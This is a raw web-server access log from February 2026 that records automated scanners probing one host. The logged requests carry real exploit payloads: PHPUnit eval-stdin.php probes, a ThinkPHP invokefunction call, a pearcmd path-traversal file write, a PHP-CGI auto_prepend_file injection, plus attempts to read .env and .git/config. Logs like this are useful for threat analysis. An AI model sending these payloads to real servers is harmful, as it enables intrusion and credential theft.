- GET http 222.117.41.51 "/api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 177.70.2.220] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:04:54:20 +0000] 404 - GET http 222.117.41.51 "/demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 177.70.2.220] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:04:54:21 +0000] 404 - GET http 222.117.41.51 "/cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 177.70.2.220] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:04:54:22 +0000] 404 - GET http 222.117.41.51 "/crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 177.70.2.220] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:04:54:23 +0000] 404 - GET http 222.117.41.51 "/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 177.70.2.220] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:04:54:24 +0000] 404 - GET http 222.117.41.51 "/backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 177.70.2.220] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:04:54:25 +0000] 404 - GET http 222.117.41.51 "/blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 177.70.2.220] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:04:54:26 +0000] 404 - GET http 222.117.41.51 "/workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 177.70.2.220] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:04:54:26 +0000] 404 - GET http 222.117.41.51 "/panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 177.70.2.220] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:04:54:27 +0000] 404 - GET http 222.117.41.51 "/public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 177.70.2.220] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:04:54:29 +0000] 404 - GET http 222.117.41.51 "/apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 177.70.2.220] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:04:54:29 +0000] 404 - GET http 222.117.41.51 "/app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 177.70.2.220] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:04:54:30 +0000] 404 - GET http 222.117.41.51 "/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello" [Client 177.70.2.220] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:04:54:31 +0000] 404 - GET http 222.117.41.51 "/public/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello" [Client 177.70.2.220] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:04:54:33 +0000] 403 - GET http 222.117.41.51 "/index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/+/tmp/index1.php" [Client 177.70.2.220] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:04:54:33 +0000] 403 - GET http 222.117.41.51 "/index.php?lang=../../../../../../../../tmp/index1" [Client 177.70.2.220] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:04:54:34 +0000] 404 - GET http 222.117.41.51 "/containers/json" [Client 177.70.2.220] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:05:01:14 +0000] 200 - GET http 222.117.41.51 "/" [Client 45.194.92.25] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[18/Feb/2026:05:01:32 +0000] 200 - GET http 222.117.41.51 "/" [Client 43.130.105.21] [Length 568] [Gzip 1.86] "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1" "-" -[18/Feb/2026:05:03:53 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[18/Feb/2026:05:16:34 +0000] 200 - GET http 222.117.41.51 "/" [Client 89.42.231.200] [Length 1033] [Gzip -] "-" "-" -[18/Feb/2026:05:17:51 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[18/Feb/2026:05:19:10 +0000] 400 - - http localhost "-" [Client 176.65.148.19] [Length 154] [Gzip -] "-" "-" -[18/Feb/2026:05:31:09 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[18/Feb/2026:05:36:24 +0000] 404 - GET http 222.117.41.51 "/login" [Client 193.142.146.230] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" -[18/Feb/2026:05:48:35 +0000] 200 - GET http 222.117.41.51 "/" [Client 206.168.34.44] [Length 568] [Gzip 1.86] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" -[18/Feb/2026:05:48:37 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 206.168.34.44] [Length 154] [Gzip -] "-" "-" -[18/Feb/2026:05:48:38 +0000] 400 - GET http 222.117.41.51 "/favicon.ico" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" -[18/Feb/2026:05:48:38 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 206.168.34.44] [Length 154] [Gzip -] "-" "-" -[18/Feb/2026:05:49:02 +0000] 404 - GET http 222.117.41.51 "/login" [Client 206.168.34.44] [Length 122] [Gzip 1.35] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" -[18/Feb/2026:05:49:02 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 206.168.34.44] [Length 154] [Gzip -] "-" "-" -[18/Feb/2026:05:54:41 +0000] 400 - POST http localhost-nginx-proxy-manager "-" [Client 159.65.119.52] [Length 154] [Gzip -] "-" "-" -[18/Feb/2026:05:54:42 +0000] 400 - POST http localhost-nginx-proxy-manager "-" [Client 159.65.119.52] [Length 154] [Gzip -] "-" "-" -[18/Feb/2026:05:54:43 +0000] 404 - POST http 222.117.41.51 "/hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" [Client 159.65.119.52] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:05:54:43 +0000] 405 - POST http 222.117.41.51 "/?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" [Client 159.65.119.52] [Length 154] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:05:54:43 +0000] 404 - GET http 222.117.41.51 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 159.65.119.52] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:05:54:43 +0000] 404 - GET http 222.117.41.51 "/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php" [Client 159.65.119.52] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:05:54:44 +0000] 404 - GET http 222.117.41.51 "/vendor/phpunit/src/Util/PHP/eval-stdin.php" [Client 159.65.119.52] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:05:54:44 +0000] 404 - GET http 222.117.41.51 "/vendor/phpunit/Util/PHP/eval-stdin.php" [Client 159.65.119.52] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:05:54:44 +0000] 404 - GET http 222.117.41.51 "/vendor/phpunit/phpunit/LICENSE/eval-stdin.php" [Client 159.65.119.52] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:05:54:45 +0000] 404 - GET http 222.117.41.51 "/vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 159.65.119.52] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:05:54:45 +0000] 404 - GET http 222.117.41.51 "/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 159.65.119.52] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:05:54:45 +0000] 404 - GET http 222.117.41.51 "/phpunit/phpunit/Util/PHP/eval-stdin.php" [Client 159.65.119.52] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:05:54:46 +0000] 404 - GET http 222.117.41.51 "/phpunit/src/Util/PHP/eval-stdin.php" [Client 159.65.119.52] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:05:54:46 +0000] 404 - GET http 222.117.41.51 "/phpunit/Util/PHP/eval-stdin.php" [Client 159.65.119.52] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:05:54:46 +0000] 404 - GET http 222.117.41.51 "/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 159.65.119.52] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:05:54:47 +0000] 404 - GET http 222.117.41.51 "/lib/phpunit/phpunit/Util/PHP/eval-stdin.php" [Client 159.65.119.52] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:05:54:47 +0000] 404 - GET http 222.117.41.51 "/lib/phpunit/src/Util/PHP/eval-stdin.php" [Client 159.65.119.52] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:05:54:47 +0000] 404 - GET http 222.117.41.51 "/lib/phpunit/Util/PHP/eval-stdin.php" [Client 159.65.119.52] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:05:54:48 +0000] 404 - GET http 222.117.41.51 "/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 159.65.119.52] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:05:54:48 +0000] 404 - GET http 222.117.41.51 "/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 159.65.119.52] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:05:54:48 +0000] 404 - GET http 222.117.41.51 "/www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 159.65.119.52] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:05:54:48 +0000] 404 - GET http 222.117.41.51 "/ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 159.65.119.52] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:05:54:49 +0000] 404 - GET http 222.117.41.51 "/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 159.65.119.52] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:05:54:49 +0000] 404 - GET http 222.117.41.51 "/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 159.65.119.52] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:05:54:49 +0000] 404 - GET http 222.117.41.51 "/ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 159.65.119.52] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:05:54:50 +0000] 404 - GET http 222.117.41.51 "/V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 159.65.119.52] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:05:54:50 +0000] 404 - GET http 222.117.41.51 "/tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 159.65.119.52] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:05:54:50 +0000] 404 - GET http 222.117.41.51 "/test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 159.65.119.52] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:05:54:50 +0000] 404 - GET http 222.117.41.51 "/testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 159.65.119.52] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:05:54:51 +0000] 404 - GET http 222.117.41.51 "/api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 159.65.119.52] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:05:54:51 +0000] 404 - GET http 222.117.41.51 "/demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 159.65.119.52] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:05:54:51 +0000] 404 - GET http 222.117.41.51 "/cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 159.65.119.52] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:05:54:52 +0000] 404 - GET http 222.117.41.51 "/crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 159.65.119.52] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:05:54:52 +0000] 404 - GET http 222.117.41.51 "/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 159.65.119.52] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:05:54:52 +0000] 404 - GET http 222.117.41.51 "/backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 159.65.119.52] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:05:54:53 +0000] 404 - GET http 222.117.41.51 "/blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 159.65.119.52] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:05:54:53 +0000] 404 - GET http 222.117.41.51 "/workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 159.65.119.52] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:05:54:54 +0000] 404 - GET http 222.117.41.51 "/panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 159.65.119.52] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:05:54:54 +0000] 404 - GET http 222.117.41.51 "/public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 159.65.119.52] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:05:54:54 +0000] 404 - GET http 222.117.41.51 "/apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 159.65.119.52] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:05:54:54 +0000] 404 - GET http 222.117.41.51 "/app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 159.65.119.52] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:05:54:55 +0000] 404 - GET http 222.117.41.51 "/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello" [Client 159.65.119.52] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:05:54:55 +0000] 404 - GET http 222.117.41.51 "/public/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello" [Client 159.65.119.52] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:05:54:55 +0000] 403 - GET http 222.117.41.51 "/index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/+/tmp/index1.php" [Client 159.65.119.52] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:05:54:56 +0000] 403 - GET http 222.117.41.51 "/index.php?lang=../../../../../../../../tmp/index1" [Client 159.65.119.52] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:05:54:56 +0000] 404 - GET http 222.117.41.51 "/containers/json" [Client 159.65.119.52] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:05:56:18 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[18/Feb/2026:05:57:48 +0000] 404 - GET http 222.117.41.51 "/.git/config" [Client 172.94.9.253] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[18/Feb/2026:05:57:49 +0000] 404 - GET http 222.117.41.51 "/admin/.git/config" [Client 172.94.9.253] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[18/Feb/2026:05:57:49 +0000] 404 - GET http 222.117.41.51 "/private/.git/config" [Client 172.94.9.253] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[18/Feb/2026:06:03:58 +0000] 200 - GET http 222.117.41.51 "/" [Client 45.194.92.25] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[18/Feb/2026:06:08:53 +0000] 400 - - http localhost "-" [Client 195.170.172.128] [Length 154] [Gzip -] "-" "-" -[18/Feb/2026:06:08:55 +0000] 400 - - http localhost "-" [Client 195.170.172.128] [Length 154] [Gzip -] "-" "-" -[18/Feb/2026:06:08:56 +0000] 400 - - http localhost "-" [Client 195.170.172.128] [Length 154] [Gzip -] "-" "-" -[18/Feb/2026:06:08:57 +0000] 400 - - http localhost "-" [Client 195.170.172.128] [Length 154] [Gzip -] "-" "-" -[18/Feb/2026:06:08:58 +0000] 400 - GET http 222.117.41.51 "/" [Client 195.170.172.128] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36" "-" -[18/Feb/2026:06:08:59 +0000] 400 - POST http 222.117.41.51 "/" [Client 195.170.172.128] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36" "-" -[18/Feb/2026:06:09:00 +0000] 400 - POST http 222.117.41.51 "/" [Client 195.170.172.128] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36" "-" -[18/Feb/2026:06:09:01 +0000] 400 - GET http 222.117.41.51 "/WuEL" [Client 195.170.172.128] [Length 654] [Gzip -] "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; ; NCLIENT50_AAPCDA5841E333)" "-" -[18/Feb/2026:06:09:03 +0000] 400 - - http localhost "-" [Client 195.170.172.128] [Length 154] [Gzip -] "-" "-" -[18/Feb/2026:06:09:04 +0000] 400 - GET http 222.117.41.51 "/a" [Client 195.170.172.128] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36" "-" -[18/Feb/2026:06:09:05 +0000] 400 - GET http 222.117.41.51 "/download/file.ext" [Client 195.170.172.128] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36" "-" -[18/Feb/2026:06:09:06 +0000] 400 - GET http 222.117.41.51 "/SiteLoader" [Client 195.170.172.128] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36" "-" -[18/Feb/2026:06:09:07 +0000] 400 - GET http 222.117.41.51 "/mPlayer" [Client 195.170.172.128] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36" "-" -[18/Feb/2026:06:09:09 +0000] 400 - POST http 222.117.41.51 "/" [Client 195.170.172.128] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36" "-" -[18/Feb/2026:06:09:10 +0000] 400 - GET http 222.117.41.51 "/" [Client 195.170.172.128] [Length 632] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36" "-" -[18/Feb/2026:06:12:28 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[18/Feb/2026:06:19:51 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[18/Feb/2026:06:20:02 +0000] 404 - GET http 222.117.41.51 "/.env" [Client 34.158.168.101] [Length 552] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 Chrome/120.0.0.0" "-" -[18/Feb/2026:06:20:03 +0000] 400 - GET http 222.117.41.51 "/.env" [Client 34.158.168.101] [Length 654] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 Chrome/120.0.0.0" "-" -[18/Feb/2026:06:20:03 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 34.158.168.101] [Length 154] [Gzip -] "-" "-" -[18/Feb/2026:06:20:04 +0000] 400 - GET http 222.117.41.51 "/" [Client 34.158.168.101] [Length 654] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 Chrome/120.0.0.0" "-" -[18/Feb/2026:06:20:04 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 34.158.168.101] [Length 154] [Gzip -] "-" "-" -[18/Feb/2026:06:20:52 +0000] 400 - GET http 222.117.41.51 "/" [Client 167.94.138.192] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" -[18/Feb/2026:06:20:53 +0000] 400 - - http localhost "-" [Client 167.94.138.192] [Length 154] [Gzip -] "-" "-" -[18/Feb/2026:06:20:57 +0000] 400 - GET http 222.117.41.51 "/.well-known/security.txt" [Client 167.94.138.192] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" -[18/Feb/2026:06:27:18 +0000] 200 - GET http 222.117.41.51 "/" [Client 74.82.47.2] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:141.0) Gecko/20100101 Firefox/141.0" "-" -[18/Feb/2026:06:28:32 +0000] 404 - GET http 222.117.41.51 "/webui/" [Client 74.82.47.2] [Length 122] [Gzip 1.35] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.1 Safari/605.1.15" "-" -[18/Feb/2026:06:33:00 +0000] 400 - GET http 222.117.41.51 "/favicon.ico" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" -[18/Feb/2026:06:34:34 +0000] 404 - GET http 222.117.41.51 "/geoserver/web/" [Client 74.82.47.2] [Length 122] [Gzip 1.35] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:141.0) Gecko/20100101 Firefox/141.0" "-" -[18/Feb/2026:06:42:15 +0000] 200 - GET http 222.117.41.51 "/" [Client 43.130.71.237] [Length 568] [Gzip 1.86] "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1" "-" -[18/Feb/2026:06:43:21 +0000] 200 - GET http 222.117.41.51 "/" [Client 109.105.210.104] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" -[18/Feb/2026:06:46:45 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[18/Feb/2026:07:03:06 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 95.215.0.144] [Length 154] [Gzip -] "-" "-" -[18/Feb/2026:07:03:07 +0000] 404 - GET http 222.117.41.51 "/aaa9" [Client 95.215.0.144] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" "-" -[18/Feb/2026:07:03:07 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 95.215.0.144] [Length 154] [Gzip -] "-" "-" -[18/Feb/2026:07:03:08 +0000] 404 - GET http 222.117.41.51 "/aab9" [Client 95.215.0.144] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" "-" -[18/Feb/2026:07:04:22 +0000] 200 - GET http 222.117.41.51 "/" [Client 195.3.221.86] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:143.0) Gecko/20100101 Firefox/143.0" "-" -[18/Feb/2026:07:11:56 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[18/Feb/2026:07:12:15 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[18/Feb/2026:07:12:39 +0000] 400 - GET http 222.117.41.51 "/version" [Client 165.154.202.146] [Length 252] [Gzip -] "-" "-" -[18/Feb/2026:07:12:39 +0000] 400 - GET http 222.117.41.51 "/" [Client 165.154.202.146] [Length 252] [Gzip -] "-" "-" -[18/Feb/2026:07:12:40 +0000] 400 - GET http 222.117.41.51 "/" [Client 165.154.202.146] [Length 252] [Gzip -] "-" "-" -[18/Feb/2026:07:12:40 +0000] 400 - GET http 222.117.41.51 "/v1" [Client 165.154.202.146] [Length 252] [Gzip -] "-" "-" -[18/Feb/2026:07:12:41 +0000] 400 - - http localhost "-" [Client 165.154.202.146] [Length 154] [Gzip -] "-" "-" -[18/Feb/2026:07:12:42 +0000] 400 - - http localhost "-" [Client 165.154.202.146] [Length 154] [Gzip -] "-" "-" -[18/Feb/2026:07:12:43 +0000] 400 - GET http 222.117.41.51 "/" [Client 165.154.202.146] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36" "-" -[18/Feb/2026:07:12:44 +0000] 400 - GET http 222.117.41.51 "/" [Client 45.142.154.64] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36" "-" -[18/Feb/2026:07:12:45 +0000] 400 - GET http 222.117.41.51 "/" [Client 45.142.154.63] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36" "-" -[18/Feb/2026:07:35:21 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[18/Feb/2026:07:46:32 +0000] 200 - GET http 222.117.41.51 "/" [Client 89.42.231.200] [Length 1033] [Gzip -] "-" "-" -[18/Feb/2026:07:58:11 +0000] 400 - GET http 222.117.41.51 "/" [Client 185.12.59.118] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0" "-" -[18/Feb/2026:08:00:48 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like 